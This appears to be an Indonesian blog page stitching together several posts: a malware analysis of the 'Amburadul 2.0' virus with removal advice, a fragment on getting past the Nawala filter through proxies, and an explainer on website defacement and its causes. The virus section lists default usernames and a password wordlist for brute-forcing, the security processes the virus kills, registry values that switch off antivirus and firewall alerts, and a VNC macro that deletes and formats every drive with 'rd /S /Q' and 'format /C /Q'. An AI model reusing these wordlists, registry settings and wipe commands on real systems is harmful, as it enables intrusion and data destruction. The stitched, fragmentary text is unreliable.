Username yang di gunakan :
- admin
- administrator
- [namakomputer]
- [namaworkgroup]
- [namauser]
- [namafilesharing]
- [namadomain]
- root
- master
- manager
- system
- sysadmin
- sysop
- SUPPORT_388945a0
- ASPNET
- HelpAssistant
dengan password dala file wordlist :
- admin
- administrator
- password
- admin123
- adm
- 123456
- 12345
- 1234567
- qwerty
- root
- [namakomputer]
- [namaworkgroup]
- [namauser]
- [namafilesharing]
- [namadomain]
- *blank*
- ..dll
Dan mengunakan teknik Bruteforcing dengan mencoba karakter A-Z, a-z,
0-9, !@#$%^&*()-{}\<> untuk menembus jaringan lokal mapun alat -
alat device seperti print server, router, access point, fingerprint, pabx,
wacom, cctv, dll.
- Membuat schduler pada Windows berupa tringger aktif dan Linux berupa crontab serta injeksi registry pada file.com, .exe, .pif, .lnk, .cmd, .txt, .jpg, dengan menambahkan explorer pada svchost.exe, userinit.exe dan winlogon.exe saat komputer di restart dan mematikan fungsi system restore dan windows/linux firewall.
6. Security Vuln : Merusak sistim kekebalan baik oleh Windows Firewall mapun aplikasi security seperti :
A2CMD, A2FREE A2GUARD A2SERVICE, ADVCHK, AGB, AHPROCMONSERVER, AIRDEFENSE, AKRNL, ALERTSVC, AMON, ANTIVIR APVXDWIN, ARMOR2NET, ASHAVAST, ASHDISP, ASHENHCD, ASHMAISV, ASHPOPWZ, ASHSERV, ASHSIMPL, ASHSKPCK, ASHWEBSV, ASWSCAN, ASWUPDSV, AVAST AVCENTER AVCIMAN, AVCONSOL, AVENGINE, AVESVC, AVEVAL, AVEVL32, AVGAM AVGCC, AVGCC32, AVGCHSVX, AVGCSRVX, AVGCTRL, AVGEMC, AVGFWSRV, AVGNSX, AVGNT, AVGNTMGR AVGSERV, AVGTRAY, AVGUARD, AVGUPSVC, AVGWDSVC, AVINITNT, AVIRA AVKSERV, AVKSERVICE, AVKWCTL, AVP, AVP32, AVPCC, AVPM, AVSCHED32, AVSERVER, AVSYNMGR, AVWUPD32, AVWUPSRV, AVXMONITOR AVXQUAR, AVZ, BDSWITCH, BITDEFENDER, BLACKD, BLACKICE, CAFIX, CCEVTMGR, CCSETMGR, CFIAUDIT, CFP, CFPCONFIG, CLAMTRAY, CLAMWIN, CUREIT, DEFENDERDAEMON, DEFWATCH, DRVIRUS, DRWADINS, DRWEB, DWEBIO, DWEBLLIO, EKRN, ESCANH95, ESCANHNT, EWIDOCTRL, EZANTIVIRUSREGISTRATIONCHECK, F-AGNT95, F-SCHED, F-STOPW, FAMEH32, FILEMON, FIREWALL FORTICLIENT, FORTISCAN, FORTITRAY, FPAVSERVER, FPROTTRAY, FPWIN, FRESHCLAM, FSAV32, FSAVGUI, FSBWSYS, FSDFWD, FSGK32, FSGK32ST, FSGUIEXE, FSMA32, FSMB32, FSPEX, FSSM32, GCASDTSERV, GCASSERV, GIANTANTISPYWARE, GUARDGUI, GUARDNT, GUARDXKICKOFF, GUARDXSERVICE, HREGMON, HRRES, HSOCKPE, HUPDATE, IAMAPP, IAMSERV, ICLOAD95, ICLOADNT, ICMON, ICSSUPPNT, ICSUPP95, ICSUPPNT, INETUPD, INOCIT, INORPC, INORT, INOTASK, INOUPTNG, IOMON98, IPTRAY, ISAFE, ISATRAY, KAV, KAVMM, KAVPF, KAVPFW, KAVSTART, KAVSVC, KAVSVCUI, KMAILMON, MAMUTU, MCAGENT, MCMNHDLR, MCREGWIZ, MCUPDATE, MCVSSHLD, MINILOG, MYAGTSVC, MYAGTTRY, NAVAPSVC, NAVAPW32, NAVLU32, NAVW32, NEOWATCHLOG, NEOWATCHTRAY, NISSERV NISUM, NMAIN, NOD32 NORMIST, NOTSTART, NPAVTRAY, NPFMNTOR, NPFMSG, NPROTECT, NSCHED32, NSMDTR, NSSSERV, NSSTRAY, NTOS, NTRTSCAN, NTXCONFIG, NUPGRADE, NVCOD, NVCTE, NVCUT, NWSERVICE, OFCPFWSVC, ONLINENT, OP_MON, OPSSVC, OUTPOST PAVFIRES, PAVFNSVR, PAVKRE, PAVPROT, PAVPROXY, PAVPRSRV, PAVSRV51, PAVSS, PCCGUIDE, PCCIOMON, PCCNTMON, PCCPFW, PCCTLCOM, PCTAV, PERSFW, PERTSK, PERVAC, PESTPATROL PNMSRV, PREVSRV, PREVX PSIMSVC, QHONLINE, QHONSVC, QHSET, QHWSCSVC, QUHLPSVC, RFWMAIN, RTVSCAN, RTVSCN95, SALITY SAPISSVC, SAVADMINSERVICE, SAVMAIN, SAVPROGRESS, SAVSCAN, SCANNINGPROCESS, SCANWSCS, SDHELP, SDRA64, SHSTAT, SITECLI, SPBBCSVC, SPHINX, SPIDERCPL, SPIDERML, SPIDERNT, SPIDERUI, SPYBOTSD, SPYXX, SS3EDIT, STOPSIGNAV, SWAGENT, SWDOCTOR, SWNETSUP, SYMLCSVC, SYMPROXYSVC, SYMSPORT, SYMWSC, SYNMGR, TAUMON, TBMON, TMLISTEN, TMNTSRV, TMPROXY, TNBUTIL, TRJSCAN, TROJAN, VBA32ECM, VBA32IFS, VBA32LDR, VBA32PP3, VBSNTW, VCRMON, VPTRAY, VRFWSVC, VRMONNT, VRMONSVC, VRRW32, VSECOMR, VSHWIN32, VSMON, VSSERV, VSSTAT, WATCHDOG, WEBSCANX, WINSSNOTIFY, WRCTRL, XCOMMSVR, ZLCLIENT, ZONEALARM
7. Modifikasi Reg : Selain menyembuyikan dari Task Manager / MsConfig, virus ini
mematikan beberapa fungsi windows dari registry seperti :
AntiVirusDisableNotify = 1
AntiVirusOverride = 1
FirewallDisableNotify = 1
FirewallOverride = 1
UacDisableNotify = 1
UpdatesDisableNotify = 1
Hidden = 2
EnableFirewall = 0
8. File Induk : Memiliki beberapa file induk :
- [fileacak].lnk // Shortcut untuk menjalankan Trojan / Backdoor
- [fileacak].pif // Trojan
- [fileacak].exe // Backdoor
- [fileacak].cmd // Script Otomatis Tringger Routine
- [fileacak].bat // Script Otomatis Tringger Routine
Terletak pada seluruh direktory file sharing maupun [drive]:\ [windir]\system32
[fileacak] = angka dan huruf dengan beberapa case menyamar sebagai svchost.exe, ctfmon.exe, alg.exe, dan csrss.exe.
9. AutoScript : Memiliki beberapa script berbahaya dengan mengunakan MacroX dengan
mengambungkan dengan port 5900 pada VNC server (bug vnc diissue dari
tahun 2003, dapat di lihat jelas pada :
http://www.realvnc.com/pipermail/vnc...ch/037830.html
http://www.securityspace.com/smysecu....html?id=10758
dengan Script Macro yang dijalankan sesuai dengan tringger routine :
MousePos=45,755
MouseButton=1,1
Activate=Start Menu
Text={UP 3}{ENTER}
Activate=Run
Text=cmd{ENTER}
Activate=Program Manager
Activate=C:\[windir]\system32\cmd.exe
Repeat=26
Drive=Drive+Chr$([Count+1])
Text=[drive]
Text=rd /S /Q .{ENTER}
Until=0
Activate=C:\[windir]\system32\cmd.exe
Text=c
Text=rd /S /Q .{ENTER}
Activate=C:\WINXP\system32\cmd.exe
Text=format /C /Q [drive]:{ENTER}
Text=Label [drive] AMBURADUL
Wait=183
Text=LABEL AMBURADULt{ENTER}
Activate=Exit
Memiliki beberapa Script Macro dengan keyboard mapun mouse untuk menjalakan aksi dengan menyusup melalui celah vnc / port 5900/5901/2
10. Solusi : Untuk mengatasi virus Amburadul versi 2.0 ini sebelumnya kami ingatkan
agar backup data/files senantiasa dan pergunakan username/password yang
tidak baku / standar, lakukan update antivirus secara berkala.
Akhir kata penulis berpesan kepada seluruh pengunakan PC di Indonesia, agar membackup data senantiasa secara terperiodik, jangan hanya mengandalkan program security, firewall atau antivirus karena program tersebut selalu kalah selangkah oleh program2 penganggu seperti virus, backdoor, trojan, dll. Lakukan update patch khususnya operating sisitim Microsoft Family, juga Linux disarankan karena virus mulai beralih ke sistim keamanan Linux. Tak lupa Vaksincom mengucapkan Hari Natal 2010 dan Tahun Baru 2011, sampai bertemu pada artikel berikutnya dengan pembahasan yang lebih menarik. Adios Amigos.
- Lakukan pemutusan terhadap jaringan/koneksi
- Disable [System Restore] selama proses pembersihan
- Matikan proses virus dengan mengunakan Process Explorer, cari beberapa file yang dicurigai seperti svchost.exe, ctfmon.exe, alg.exe dengan byte yang besar dan proses load processor yang tinggi serta beberapa file ext .tmp, .lnk, .sys, .drv dan file ext yang tidak standart.
- Agar tidak terinfeksi kembali lakukan pembatasan pada policy windows dengan cara :
Caranya:
-. Start -- Run ketik perintah SECPOL.MSC kemudian klik tombol [OK]
-. Setelah muncul layar Local Security Settings, klik kanan pada menu Software Restriction Policies lalu klik Create New Policies
-. Pada menu Software Restriction Policies, klik Additional Rules
-. Klik kanan pada Additional Rules, kemudian pilih New Hash Rule, dan akan muncul layar New Hash Rule
-. Pada kolom File hash klik tombol Browse, kemudian arahkan ke direktori [C:\Windows\system32\[fileacakvirus.exe] dan klik tombol [Open]
-. Pada kolom Security level pilih [Disallowed]
-. Pada kolom description boleh di isi atau dikosongkan saja
-. Klik tombol [Apply] dan [Ok]
Catatan: Jika komputer Anda tidak terinstall Windows XP Professional / 2003 Server 2000 Server / Vista / 2008 lewati langkah ini.- Hapus string registry dengan mengunakan CureIt dan Repair dengan mengunakan TuneUp Utilities 2010
- Jika terinfeksi virus ini, user tidak dapat melakukan booting Windows dengan muncul pesan error NTLDR Is Missing, sebaiknya dilakukan Repiar atau Install ulang.
- Sementara untuk file yang telah di hapus, dapat direcovery mengunakan software Recovery seperti getDataBase / EasyRecovery / Recovery My Files dengan mengunakan type delete atau format recovery.
- Hapus seluruh file virus dengan mengunakan Kaspersky Virus Removal Tools 2010 yang dapat di download :
http://support.kaspersky.com/viruses...ol2010?level=2- Update patch security terbaru untuk celah port 5900, rpc, ipc$ melalui
site microsoft : http://www.microsoft.com/downloads- Backup Data Anda sekarang juga!!! dan update antivirus!!
-
-
--
by budiaji»
-
-
--
by budiaji»
Tutorial ini tidal bermaksud untuk melakuka kejahatan” cyber…tutorial ini semata hanya untuk info kepada nawala bahwa block yang mereka lakukan masih bisa di tembus dengan mudah
1.siapkan proxy aktiv Cari di artikel sebelum nya
2.masukan Ip proxy yang ada pilih..ingat cek aktiv atau tidak
-
-
--
by budiaji»
Apa itu deface dan bagai mana cara melakukan nya
Jenis-jenis pen-Deface-an
1. full of page
artinya mendeface Satu halaman penuh tampilan depan alias file index
atau file lainnya yang akan diubah (deface) secara utuh, artinya untuk
melakukan ini biasanya seorang 'defacer' umumnya harus berhubungan
secara 'langsung' dengan box (mesin) atau usaha mendapatkan priveleged
terhadap mesin, baik itu root account or sebagainya yang memungkinkan
defacer dapat secara interaktif mengendalikan file indek dan lainnya
secara utuh.umumnya dengan memanfaatkan kelemahan kelemahan pada
services services yang berjalan di mesin, sehingga dapat melakukan
pengaksesan ke mesin ngerti gag kalo gag tau gag usah belajar lagi… : ☺ kiding.
Cara-cara yang ditempuh umumnya sama dengan step-step yang dilakukan
untuk melakukan "hack in to the machine" yang sudah banyak di tulis
dan diterjemahkan bahkan di bahas di artikel artikel yang dirilis
baik secara resmi atau 'underground' . penulis pernah membaca karya
Onno W purbo. (ini yang di inget :) ☺
so, karena bukan ini yang akan kita bahas pada artikel ini maka,lanjut!
ups !! ntar dulu! caranya boleh sama, hacking, defacing dan cracking,
tetapi! hasil akhirnya yang menentukan apakah itu cracker, hacker or
defacer yang melakukannya. ok!!
2. Sebagian atau hanya menambahi
artinya, defacer mendeface suatu situs tidak secara penuh, bisa hanya
dengan menampilkan beberapa kata, gambar atau penambahan script script
yang mengganggu, hal ini umumnya hanya akan memperlihatkan tampilan
file yang di deface menjadi kacau dan umumnya cukup mengganggu,
defacer biasanya mencari celah baik dari kelemahan scripting yang
digunakan dengan XSS injection , bisa dengan SQL atau database
injection dan juga beberapa vulnerabilities yang seringkali ditemukan
pada situs situs yang dibangun dengan menggunakan CMS
(content Manajemen System)
berbagai contoh XSS dapat di lihat di berbagai web, atau bisa dilihat
di http://staff32.co.cc juga pernah di post beberapa contoh XSS dan metoda lainnya yang ditujukan untuk "pendidikan"
saja.
Defacing umumnya dapat terjadi dikarenakan:
Masalah Internal
1. Kesalahan konfigurasi
Setiap kali aku membaca buku, artikel ataupun literatur tentang security' maka hal ini yang selalu di letakkan sebagai peyebab utama kelemahan suatu sistem yang telah di ciptakan; pernah dengar kata kata " firewall yang tidak di konfiguraskan dengan baik bukanlah merupakan firewall" jadi tidak peduli software apapun atau sistem apapun yang di akan terapkan! maka apabila tidak di konfigurasikan dengan baik malah akan menjadi 'bumerang' bagi sistem itu sendiri.bisa jadi sesuai dengan istilah 'pagar makan tanaman' :P
+ cara menanggulanginya
kebutuhan dengan peripheral + SDM yang dimiliki untuk dapat
dihasilkan semua policy yang dahsyat!
2. kelalaian admin
Apabila Konfigurasi telah sesuai, maka faktor ' man behind the gun'
yang akan berbicara banyak; sehingga faktor internal kedua adalah
manusia yang menggelola server tersebut: adpun jenis kelalaian yang
dapat terjadi adalah :
- install file && folder
webmaster atau admin biasanya lalai dalam menghapus file
yang digunakan untuk menginstallasi portal web model CMS
ex : folder /install,dan file install.php pada phpnuke,
postnuke, phpbb, dsb
+ untuk menanggulanginnya : ada baiknya seorang administrator
membaca manual (kerjaan admin!!) modul CMS yang di gunakan dan melakukan uji silang (cross check) alias "posisikan anda sebagai attacker"
- file konfigurasi && permision
webmaster atau admin lupa mengatur permisi pada file file
konfigurasi yang penting, yang menyangkut administrasi dan
konfigurasi file, khususnya file-file yang mencatat
password, baik password database dsb.
ex: file config.txt, config.php, config.inc
+ untuk menanggulanginya
biasanya di gunakan perintah chmod pada file dan folder
chown dan chattr
- run of date
Terlalu lama peng-update-an suatu web atau tidak secara
terus-terusan mengupdate webnya khususnya portal yang dibundel
dalam CMS, serta juga packet packet yang terinstalasi di mesin
baik itu web server sendiri , database server dan sebagainya
yang bisa menjadi pintu masuk bagi 'defacer'.
+ untuk menanggulanginya, anda cuma perlu rajin rajin dan rutin
menggunjungi situs situs yang menyediakan update dari packet
yang digunain. (yang jelas OL mulu man jangan kaya admin staff oL pake operamini kebangetan dah !!!)
- run of services
kesalahan konfigurasi terhadap services/layanan yang diberikan
khususnya terlalu banyak menjalankan layanan yang tidak
diperlukan pada setiap server.
services ===> port
semakin banyak layanan yang di jalankan maka akan semakin
banyak port yang di gunakan untuk melayani layanan tersebut,
sehingga semakin banyak yang perlu diperhatikan. Pengkerucutan
atau minimalisir layanan adalah cara yang dapat di lakukan.
+ cara menanggulanginya
Audit semua sistem anda sebelum di 'launch' cek semua services
yang berjalan dan sesuaikan dengan kebutuhan!
- cannot keep secret
berkaitan dengan "social engineering", maka kepercayaan adalah
hal terpenting, "TRusT NO BODY" mungkin pilihan yang sangat
masuk akal dalam menanggulangi hal ini.
Pribadi dan mental seorang webmaster atau admin sangat
menentukan!
+ cara menanggulanginya , keep your own secret alias "inget man!!
lo tu admin! bukan tukang gosip yang EMBERRRR" :P
- Kurang berhati-hati saat login ke mesin dsb
Sniffing yang dilakukan dari jaringan lokal sangat berkemungkinan
untuk mendapatkan password yang di pakai oleh r00t, admin,
webmaster dsb.
+ cara menanggulanginya
setting server anda untuk menolak melakukan login baik remote
dan lokal untuk tidak menggunakan r00t ( tau gak caranya? kalo
gak!! berhenti aja jadi admin :P ), gunakan perintah substitute.
untuk login secara remote upayakan penggunaan SSH dan SSL,
beberapa konfigurasi mungkin dapat berguna untuk menanggulanginya,
baik konfigurasi pc yang boleh akses remote baik berdasar ip,
konfigurasi di jaringan, firewall dsb
- etc, goes here (lain-lain tambah disini :P) ...
3. pengkhianatan
Apabila anda sering membaca, mendengar atau berdiskusi tentang
berbagai kebocoran akibat 'social engineering' yang dilakukan,
mungkin hal ini sudah menjadi maklum bagi anda semua.Apalagi
bagi anda yang pernah membaca buku 'art of deception' karangan
kevin mitnick maka anda akan memahami betapa besarnya kebocoran
yang tercipta dari penggunaan metoda tersebut.Bayangkan jika
hal tersebut terjadi dikarenakan unsur kesengajaan ?
Mungkin terlalu sangar juga kata kata itu (hehe), tetapi apa
boleh buat, hal ini pernah terjadi bahkan sering terjadi.
mungkin juga beberapa intrik politis dan sosial sudah bergabung
didalamnya, so sangat mungkin hal ini terjadi.adapun beberapa
individu yang mungkin terkena :
1.Administrator
2.Second Admin /Staff
3.WebMaster
4.User yang terdapat di mesin Server
5......
Kenapa hal ini aku masukkan, padahal lebih nggak teknis (embeer)
ini juga patut di waspadai lho, beberapa persen kasus terjadi
